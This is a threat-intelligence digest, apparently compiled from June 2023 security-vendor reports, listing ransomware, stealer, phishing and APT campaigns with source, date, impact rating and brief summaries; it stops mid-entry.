- Two years ago, a new ransomware known as “TargetCompany” appeared and got a lot of attention due to its unique method of appending the name of the targeted company as a file extension. This ransomware variant was also noticed using a “.mallox” extension on encrypted files, linking it to its previous identification as “Mallox”. Last year, Cyble Research analysts also observed a significant spike in Mallox ransomware samples. Cyble analysts have now discovered a new variation of the Mallox ransomware that appends the file extension “.malox” to encrypted files, whereas previously it used the “.mallox” extension. This ransomware binary is deployed using BatLoader, similar to the one previously reported spreading RATs and stealers.
Source:
https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/
—
- Intel Source:
- KrebsOnSecurity
- Intel Name:
- The_Service_in_question_rents_email_addresses
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- The service in question from the KrebsOnSecurity blog, kopeechka[.]store, is a kind of unidirectional email confirmation-as-a-service that lures users to “save your time and money for successfully registering multiple accounts.” The service offers to cut the costs associated with large-scale spam and account creation campaigns by paying people to sell their email account credentials and letting customers temporarily rent access to a vast pool of established accounts at major providers.
—
- Intel Source:
- Zscaler
- Intel Name:
- RedEnergy_Stealer_as_a_Ransomware_Attacks
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Zscaler researchers have discovered a new malware variant, RedEnergy stealer that fits into the hybrid Stealer-as-a-Ransomware threat category. RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Infection_Strategy_Implemented_by_Mallox_Ransomware
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a new variation of the Mallox ransomware that now appends the file extension .malox to encrypted files, whereas previously it used the .mallox extension. This ransomware binary is deployed using BatLoader, similar to the one previously reported spreading RATs and stealers.
Source:
https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese_Hacking_Group_Flea_Targeting_American_Ministries
- Date of Scan:
- 2023-06-22
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have identified a Chinese state-sponsored actor named Flea targeting foreign affairs ministries in the Americas as part of a recent campaign that spanned from late 2022 to early 2023.
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Distributing_CHM_Malware
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have continuously tracked the Kimsuky group’s APT attacks. While the Kimsuky group often used document files for malware distribution, there have been many recent cases where CHM files were used in distribution. Also, unlike in the past when the document files contained North Korea-related topics, the group is now attempting to attack using a variety of subjects.
—
- Intel Source:
- ASEC
- Intel Name:
- RedEyes_Group_Wiretapping_Individuals
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have found that RedEyes (APT37) is a state-sponsored APT group targeting individuals. The group recently used an infostealer with wiretapping capabilities and a GoLang backdoor. Spear-phishing emails were used for initial access, and the Ably platform for command and control. Privilege escalation techniques were employed, and an infostealer named FadeStealer stole data and wiretapped microphones.
—
- Intel Source:
- CERT-UA
- Intel Name:
- APT28_Group_Leveraging_Three_Roundcube_Exploits
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- CERT-UA researchers have discovered that APT28 utilized three exploits targeting Roundcube (CVE-2020-35730, CVE-2021-44026, CVE-2020-12641) during a recent espionage campaign against a Ukrainian government organization. The attack involved malicious emails containing exploit code and JavaScript files for exfiltration.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Evaluation_of_Threat_Group_Muddled_Libra
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- PaloAlto researchers have identified that a new threat group dubbed “Muddled Libra” is targeting large outsourcing firms with multi-layered, persistent attacks that start with smishing and end with data theft. The group is also using the infrastructure that it compromises in downstream attacks on victims’ customers.
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_MULTI_STORM_Attack_Campaign_by_Python_Loader
- Date of Scan:
- 2023-06-22
- Impact:
- MEDIUM
- Summary:
- An interesting phishing campaign was recently analyzed by the Securonix Threat Research Team. The attack kicks off when the user clicks on a heavily obfuscated JavaScript file contained in a password-protected ZIP file. The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT. Both are used for command and control during different stages of the infection chain.
—
- Intel Source:
- Fortinet
- Intel Name:
- Condi_DDoS_Botnet_Spreading_Through_TP_Link_Vulnerability
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- Fortinet researchers have observed that a new DDoS-as-a-Service botnet called “Condi” emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to build an army of bots to conduct attacks.
Source:
https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389
—
- Intel Source:
- ASEC
- Intel Name:
- The_Examination_of_Ransomware_With_BAT_File_Extension_Attacking_MS_SQL_Servers
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the Mallox ransomware with the BAT file extension being distributed to poorly managed MS-SQL servers. Extensions of files distributed to poorly managed MS-SQL servers include not only EXE but also BAT, which is a fileless format. The files distributed with the BAT file extension that have been discovered so far are Remcos RAT and Mallox.
—
- Intel Source:
- ASEC
- Intel Name:
- Disguised_malware_as_a_security_update_installer
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- AhnLab recently discovered an attack by a hacking group that is supported by a certain government. The discovered malware disguised itself as a security update installer and was developed using the Inno Setup software.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_analysis_June_4_10_2023
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring phishing email threats with their automatic sample analysis system (RAPIT) and honeypot. Their post covers the cases of phishing email distribution observed during the week from June 4th, 2023 to June 10th, 2023 and provides statistical information on each type.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Malware_Campaign_Targeting_LetsVPN_Users
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered the existence of numerous counterfeit LetsVPN websites while conducting a routine threat-hunting exercise. These fraudulent sites share a common user interface and are deliberately designed to distribute malware, masquerading as the genuine LetsVPN application.
Source:
https://blog.cyble.com/2023/06/16/new-malware-campaign-targets-letsvpn-users/
—
- Intel Source:
- eSentire
- Intel Name:
- The_Analysis_of_Resident_Campaign
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- eSentire researchers have observed the resurgence of what they believe to be a malicious campaign targeting manufacturing, commercial, and healthcare organizations.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
—
- Intel Source:
- eSentire
- Intel Name:
- DcRAT_a_clone_of_AsyncRAT
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- In May 2023, eSentire identified DcRAT, a clone of AsyncRAT, at a consumer services customer. DcRAT is a remote access tool with info-stealing and ransomware capabilities. The malware is actively distributed using explicit lures for OnlyFans pages and other adult content.
—
- Intel Source:
- eSentire
- Intel Name:
- Aurora_Stealer_malware_analysis
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- The post discusses the Aurora Stealer malware targeting the manufacturing industry through fake downloads distributed via Google Ads. The malware gathers sensitive data, is sold under a pricing plan, and is written in the Go programming language. The post also provides indicators of compromise and recommendations for protection against the malware.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer
—
- Intel Source:
- Bitdefender
- Intel Name:
- Hackers_Running_an_Active_Cryptojacking_Campaign
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Bitdefender security researchers have discovered a threat group likely based in Romania that’s been active since at least 2020. They’ve been targeting Linux-based machines with weak SSH credentials, mainly to deploy Monero mining malware, but their toolbox allows for other kinds of attacks.
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_Aesi_Return_with_Darth_Vidar
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have observed that Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia.
Source:
https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Ransomware_Variant_Big_Head
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- FortiGuard Labs have recently come across a new ransomware variant called Big Head, which came out in May 2023. Although there are at least three variants of Big Head ransomware, all are designed to encrypt files on victims’ machines to extort money, like other ransomware variants.
Source:
https://www.fortinet.com/blog/threat-research/fortiguard-labs-ransomware-roundup-big-head
—
- Intel Source:
- Checkpoint
- Intel Name:
- Attackers_Abusing_Legitimate_Services_For_Credential_Theft
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Check Point researchers have detected an ongoing phishing campaign that uses legitimate services for credential harvesting and data exfiltration in order to evade detection.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malware_Delivering_Through_Dot_inf_File
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a .inf file and observed that it is being used to deliver malware.
—
- Intel Source:
- ASEC
- Intel Name:
- Tsunami_DDoS_Malware_Distributing_to_Linux_SSH_Servers
- Date of Scan:
- 2023-06-20
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered an attack campaign that consists of the Tsunami DDoS Bot being installed on inadequately managed Linux SSH servers. Not only did the threat actor install Tsunami, but they also installed various other malware such as ShellBot, XMRig CoinMiner, and Log Cleaner.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Hackers_Targeting_Middle_Eastern_and_African_Governments_with_Advanced_Techniques
- Date of Scan:
- 2023-06-20
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have identified that Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques.
—
- Intel Source:
- Bitdefender
- Intel Name:
- The_Aesir_Return_with_Darth_Vidar
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- Bitdefender researchers have described the behaviors observed in a recent incident they investigated, in which a presumably custom malware tracked by researchers as the Logutil backdoor was deployed. The operation was active for more than a year with the end goal of compromising credentials and exfiltrating data.
—
- Intel Source:
- ASEC
- Intel Name:
- RecordBreaker_Infostealer_Disguised_as_a_Dot_NET_Installer
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- ASEC researchers have observed a case in which an encrypted malware file is downloaded from the threat actor’s server and executed. The malware in this instance is the RecordBreaker (Raccoon Stealer V2) infostealer.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- RAT_Delivering_Through_VBS
- Date of Scan:
- 2023-06-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed a RAT being delivered via VBS.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyberattacks_Against_Users_of_UKR_NET_Service
- Date of Scan:
- 2023-06-19
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have reported that an e-mail was received from a participant of the information exchange with the subject “Suspicious activity observed @UKR.NET” and an attachment in the form of a PDF file, “Security warning.pdf”, sent apparently on behalf of UKR.NET technical support. The PDF document contains a link to a fraudulent web resource that imitates the web page of the mail service.
—
- Intel Source:
- CERT-UA
- Intel Name:
- GhostWriter_Group_Targeting_State_Organization_of_Ukraine
- Date of Scan:
- 2023-06-19
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered the PPT document “daewdfq342r.ppt”, which contains a macro and a thumbnail image with the emblem of the National Defense University of Ukraine named after Ivan Chernyakhivskyi.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Formbook_From_Possible_ModiLoader
- Date of Scan:
- 2023-06-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the recent Formbook samples and came across an example that kicks off with an Excel file exploiting CVE-2017-11882 to use what seems like ModiLoader (also known as DBatLoader).
—
- Intel Source:
- Cyfirma
- Intel Name:
- An_Evolving_Stealer_Called_Mystic
- Date of Scan:
- 2023-06-18
- Impact:
- LOW
- Summary:
- CYFIRMA researchers’ team recently discovered an information stealer called Mystic Stealer being promoted in an underground forum, with the threat actor utilizing a Telegram channel for their operations.
Source:
https://www.cyfirma.com/outofband/mystic-stealer-evolving-stealth-malware/
—
- Intel Source:
- Sygnia
- Intel Name:
- Analazying_a_global_adversary_in_the_middle_campaign
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- At the beginning of this year, Sygnia’s IR team investigated and analyzed a Business Email Compromise (BEC) attack against one of its clients. The threat actor gained initial access to one of the victim employees’ accounts and executed an ‘Adversary In The Middle’ attack to bypass Office365 authentication and gain persistent access to that account. After gaining access, the threat actor exfiltrated data from the compromised account and used the access to spread phishing attacks to other employees of the victim along with several external targeted organizations.
Source:
https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit
—
- Intel Source:
- Symantec
- Intel Name:
- Long_Running_Shuckworm_Intrusions_Against_Ukrainian_Organizations
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Symantec researchers have identified that the Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments.
—
- Intel Source:
- Checkmarx
- Intel Name:
- Supply_Chain_Attackers_Exploiting_New_Technique
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Checkmarx researchers have identified a new attack technique for hijacking S3 buckets by Supply Chain Attackers.
—
- Intel Source:
- Stairwell
- Intel Name:
- Chinese_Hackers_Using_DNS_Over_HTTPS_For_Linux_Malware_Communication
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Researchers from Stairwell have observed that the Chinese threat group ‘ChamelGang’ is infecting Linux devices with a previously unknown implant named ‘ChamelDoH,’ allowing DNS-over-HTTPS communications with attackers’ servers.
Source:
https://stairwell.com/news/chamelgang-and-chameldoh-a-dns-over-https-implant/
—
- Intel Source:
- Cofense
- Intel Name:
- MultiStage_Phishing_Attac_Targeted_Xneelo_Users
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a multi-stage phishing campaign targeting Xneelo customers, involving a fake KonsoleH login page to obtain login details, credit card information, and SMS 2FA codes.
Source:
https://cofense.com/blog/xneelo-users-targeted-in-a-multi-stage-phishing-attack/
—
- Intel Source:
- CADO Security
- Intel Name:
- An_Emerging_Romanian_Threat_Actor_Named_Diicot
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Cado security researchers have identified an interesting attack pattern that could be attributed to the threat actor Diicot (formerly, “Mexals”).
Source:
https://www.cadosecurity.com/tracking-diicot-an-emerging-romanian-threat-actor/
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_group_exploiting_Korean_finance_security_solution_vulnerability
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- The ASEC team has observed the Lazarus threat group exploiting new vulnerabilities in VestCert and TCO!Stream. Updating the affected software promptly mitigates the risk, alongside staying informed and strengthening security measures against advanced threats.
—
- Intel Source:
- Trellix
- Intel Name:
- Phishing_Attacks_Using_HTML_Attachments
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- Trellix researchers have identified that phishing attacks using HTML attachments are increasing rapidly, targeting global industries with obfuscation and evasion techniques, which requires heightened vigilance and strong email security measures.
—
- Intel Source:
- Netskope
- Intel Name:
- Netskope_DL_based_Inline_Phishing_Detection
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- Netskope Threat Labs note that ChatGPT facilitates natural language processing and communication, while Netskope’s Inline Phishing Detection focuses on identifying and blocking phishing attacks in real time.
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- A_New_ChromeLoader_Campaign_Named_Shampoo
- Date of Scan:
- 2023-06-16
- Impact:
- MEDIUM
- Summary:
- HP Wolf Security detects new malware campaign “Shampoo” utilizing malicious ChromeLoader extension. It steals sensitive information, injects ads, and poses challenges for removal.
Source:
https://threatresearch.ext.hp.com/shampoo-a-new-chromeloader-campaign/
—
- Intel Source:
- Microsoft
- Intel Name:
- Introducing_Cadet_Blizzard_as_a_Significant_New_Russian_Threat_Actor
- Date of Scan:
- 2023-06-15
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have updated details about techniques of a threat actor formerly tracked as DEV-0586—a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard.
—
- Intel Source:
- Trellix
- Intel Name:
- New_Golang_Based_Skuld_Malware
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Trellix researchers have identified a new Golang-based information stealer called Skuld that has compromised Windows systems across Europe, Southeast Asia, and the US.
—
- Intel Source:
- Sygnia
- Intel Name:
- Analyzing_a_global_adversary_in_the_middle_campaign
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- At the beginning of this year, Sygnia’s IR team investigated and analyzed a Business Email Compromise (BEC) attack against one of its clients. The threat actor gained initial access to one of the victim employees’ accounts and executed an ‘Adversary In The Middle’ attack to bypass Office365 authentication and gain persistent access to that account. After gaining access, the threat actor exfiltrated data from the compromised account and used the access to spread phishing attacks to other employees of the victim along with several external targeted organizations.
Source:
https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit
—
- Intel Source:
- Dr.WEB
- Intel Name:
- Pirated_Windows_10_ISOs_Install_Clipper_Malware
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Dr.WEB researchers have identified that hackers are distributing Windows 10 ISOs via torrents that hide cryptocurrency hijackers in the EFI (Extensible Firmware Interface) partition to evade detection.
—
- Intel Source:
- Cyble
- Intel Name:
- WannaCry_Imitator_targets_Russian_Gaming_Community
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Cyble researchers recently observed several phishing campaigns that use gaming sites as a distribution channel for various malware families. They discovered a phishing campaign targeting Russian-speaking gamers in order to distribute ransomware. The fake website offers a download that contains a legitimate game installer and ransomware. The ransomware uses the name “WannaCry 3.0” and the “wncry” file extension for encrypted files, although it is not an original variant of the WannaCry ransomware. It is a modified version of an open-source ransomware, “Crypter”, developed for Windows and written purely in Python.
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_Look_into_Earth_Preta_Hidden_Working
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discussed the more technical details of the most recent tools, techniques, and procedures (TTPs) leveraged by the Earth Preta APT group.
—
- Intel Source:
- Netskope
- Intel Name:
- The_risks_of_zip_and_mov_domains
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- Some time ago Google announced eight new top-level domains. Two of them (.zip and .mov) have been a concern because they are identical to well-known file extensions. Both the .zip and .mov TLDs are not new, as they have been available since 2014. The main threat is that anyone can now own a .zip or .mov domain at a low price and take advantage of it for social engineering. The threat with the .zip and .mov domains is that attackers will be able to craft URLs that appear to be delivering ZIP and MOV files, but instead redirect victims to malicious websites.
Source:
https://www.netskope.com/blog/zip-and-mov-top-level-domain-abuse-one-month-after-being-made-public
—
- Intel Source:
- Securelist
- Intel Name:
- Multistage_DoubleFinger_loads_GreetingGhoul_stealer
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- Securelist shared their analysis of the multi-stage DoubleFinger loader delivering a cryptocurrency stealer. DoubleFinger is deployed on the target machine when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger’s loader stages.
Source:
https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Threats_analyses_May_28_June_3_20
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from May 28th to June 3rd, 2023 and provides statistical information on each type.
—
- Intel Source:
- Sophos
- Intel Name:
- Diving_Deep_into_Pikabot_Cyber_Threat
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- Sophos researchers have analyzed Pikabot, a modular malware trojan acting as a backdoor that allows unauthorized remote access and executes diverse commands received from a command-and-control server. It has the potential for multi-staged attacks.
Source:
https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Activity_of_DShield_Honeypot
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Researchers from SANS have reviewed the DShield honeypot activity recorded during the previous month. Also interesting is how the activity varies from week to week.
Source:
https://isc.sans.edu/diary/DShield+Honeypot+Activity+for+May+2023/29932/
—
- Intel Source:
- Cyble
- Intel Name:
- Malicious_PyPI_Packages
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs analysts have been actively tracking malicious Python packages and recently observed several different infostealers. One is dubbed KEKW and was spreading through multiple malicious Python packages; another is the Creal Stealer, an open-source stealer that has been extensively utilized by threat actors. There had been no evidence of it being propagated through Python packages, but Cyble researchers discovered several Python packages that were found to distribute the Creal Stealer. Others, the TIKCOCK GRABBER, the Hazard Token Grabber and the W4SP stealer, are information stealers that focus on extracting sensitive information from victims’ systems. Cyble’s analysis revealed that infostealers, a specific type of malware, were predominantly propagated through malicious Python packages. The presence of readily accessible code for information stealers on platforms like GitHub has empowered multiple threat actors to leverage this particular strain of malware in their campaigns.
Source:
https://blog.cyble.com/2023/06/09/over-45-thousand-users-fell-victim-to-malicious-pypi-packages/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Undetected_PowerShell_Backdoor
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- ISC.SANS researcher Xavier Mertens found a script that scored 0/59 on VT and provided the details of his findings. The file was found with the name “Microsoft.PowerShell_profile.ps1”. The attacker chose that name because it is a familiar name used by Microsoft to manage PowerShell profiles.
—
- Intel Source:
- Obsidian
- Intel Name:
- A_SaaS_ransomware_attack_against_a_Sharepoint_365
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Obsidian’s Threat Research team has observed a SaaS ransomware attack against a company’s SharePoint Online (Microsoft 365) that did not use a compromised endpoint. Obsidian’s team and product were leveraged post-compromise to determine the finer details of the attack.
Source:
https://www.obsidiansecurity.com/blog/saas-ransomware-observed-sharepoint-microsoft-365/
—
- Intel Source:
- Cyble
- Intel Name:
- Darkrace_Ransomware_Resembles_LockBit_Ransomware
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new ransomware named Darkrace which has similarities with LockBit ransomware. It specifically targets Windows operating systems and exhibits several similarities to the LockBit ransomware, including the deployment of batch files to terminate processes, the dropping of file icons, and the utilization of random encryption extensions.
Source:
https://blog.cyble.com/2023/06/08/unmasking-the-darkrace-ransomware-gang/
—
- Intel Source:
- Elastic
- Intel Name:
- Hackers_Targeting_Vietnamese_Public_Companies_With_SPECTRALVIPER_Backdoor
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Researchers from Elastic have identified an ongoing campaign that deploys a novel backdoor called SPECTRALVIPER which is targeting Vietnamese public companies. It is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities.
Source:
https://www.elastic.co/security-labs/elastic-charms-spectralviper
—
- Intel Source:
- DFIR Report
- Intel Name:
- Truebot_Using_Cobalt_Strike_and_FlawedGrace
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- The DFIR Report researchers have identified that Truebot is being delivered through a Traffic Distribution System. This campaign, observed in May 2023, leveraged email for the initial delivery mechanism. After clicking through the link in an email, the victim would be redirected through a series of URLs before being presented with a file download at the final landing page.
Source:
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
—
- Intel Source:
- Securelist
- Intel Name:
- Satacom_malware_steals_cryptocurrency
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Securelist shared their analysis of a recent malware distribution campaign related to the Satacom downloader, also known as LegionLoader, a renewed malware family that has been around since 2019. The main goal of the malware dropped by the Satacom downloader is to steal BTC from the victim’s account by performing web injections into targeted cryptocurrency websites. The malware tries to install an extension for Chromium-based web browsers, which later communicates with its C2 server, whose address is stored in the BTC transaction data.
Source:
https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/
—
- Intel Source:
- Blackberry
- Intel Name:
- RomCom_Group_Targeting_Politicians_in_Ukraine_and_US_Based_Healthcare
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- Blackberry researchers have observed RomCom targeting politicians in Ukraine who are working closely with Western countries, and a U.S.-based healthcare company providing humanitarian aid to the refugees fleeing from Ukraine and receiving medical assistance in the U.S.
Source:
https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine
—
- Intel Source:
- Cofense
- Intel Name:
- Caffeine_phishing_domains_and_patterns_still_active_despite_store_closure
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Cofense researchers have observed an ongoing and evolving credential phishing campaign specifically targeting Microsoft Office 365 credentials. This campaign involves the distribution of fraudulent emails that aim to deceive recipients and trick them into divulging their Office 365 login credentials.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- The_Details_About_Asylum_Ambuscade_Cybercrime_Group
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Researchers from Welivesecurity have analyzed the Asylum Ambuscade cybercrime group that has been performing cyberespionage operations on the side and provided details about the early 2022 espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.
Source:
https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/
—
- Intel Source:
- Group-IB
- Intel Name:
- Dark_Pink_APT_Group_Return_With_5_Victims_in_New_Countries
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Group-IB researchers have identified new tools, exfiltration mechanisms, and victims in new industries, in countries that Dark Pink has never targeted before. It has continued to attack government, military, and non-profit organizations in the Asia-Pacific expanding its operations to Thailand and Brunei. Another victim, an educational sector organization, has also been identified in Belgium.
—
- Intel Source:
- Checkpoint
- Intel Name:
- North_African_Espionage_Attacks_Using_Stealth_Soldier_Backdoors
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- Check Point researchers have identified an ongoing operation against targets in North Africa involving a previously undisclosed multi-stage backdoor called Stealth Soldier. The malware’s command-and-control network is part of a larger set of infrastructure, used at least in part for spear-phishing campaigns against government entities.
—
- Intel Source:
- JPCERT
- Intel Name:
- GobRAT_malware_targeting_Linux_routers
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- JPCERT/CC has shared details of attacks that infected routers in Japan with malware around February 2023. Their analysis blog post gives the details of the attack confirmed by JPCERT/CC and of the GobRAT malware used in it. Based on JPCERT’s analysis, the attack initially targets a router whose web UI is open to the public, executes scripts possibly by exploiting vulnerabilities, and finally infects the router with GobRAT.
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Distributing_Malicious_Job_Application_Letters
- Date of Scan:
- 2023-06-08
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that malware disguised as a job application letter is continuously being distributed. This malware is equipped with a feature that checks for the presence of various antivirus processes.
—
- Intel Source:
- Barracuda
- Intel Name:
- Zero_Day_Flaw_in_Barracuda_Email_Security_Gateway_Appliances
- Date of Scan:
- 2023-06-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Barracuda have urged their customers who were impacted by a recently disclosed zero-day flaw in its Email Security Gateway (ESG) appliances to immediately replace them.
Source:
https://www.barracuda.com/company/legal/esg-vulnerability
—
- Intel Source:
- Cofense
- Intel Name:
- The_Return_of_Vacation_Request_Phishing_Emails
- Date of Scan:
- 2023-06-08
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign where the threat actor sends an email to a user that claims to be from the ‘HR Department’ and provides the user with a link to submit their annual leave requests.
Source:
https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- ITG10_Group_Targeting_South_Korean_Entities
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- IBM Security researchers have uncovered documents that are most likely part of a phishing campaign mimicking credible senders, orchestrated by a group X-Force refers to as ITG10, and aimed at delivering RokRAT malware.
Source:
https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/
—
- Intel Source:
- Recorded Future
- Intel Name:
- North_Korean_TAG71_Group_Spoofs_Asian_and_US_Financial_Institutions
- Date of Scan:
- 2023-06-07
- Impact:
- MEDIUM
- Summary:
- Recorded Future researchers have discovered malicious cyber threat activity spoofing several financial institutions and venture capital firms in Japan, Vietnam, and the United States. They refer to the group behind this activity as Threat Activity Group 71 (TAG-71). They also identified 74 domains resolving to 5 IP addresses, as well as 6 malicious files, in the most recent cluster of activity from September 2022 to March 2023.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0606.pdf
—
- Intel Source:
- Lumen
- Intel Name:
- Qakbot_Retool_Reinfect_Recycle
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- Lumen researchers analyzed recent Qakbot campaigns to understand their network structure, and gained key insights into the methods that support Qakbot’s reputation as an evasive and tenacious threat.
Source:
https://blog.lumen.com/qakbot-retool-reinfect-recycle/?utm_source=substack&utm_medium=email
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Targeting_Korean_Users_via_Malicious_Document_Files
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
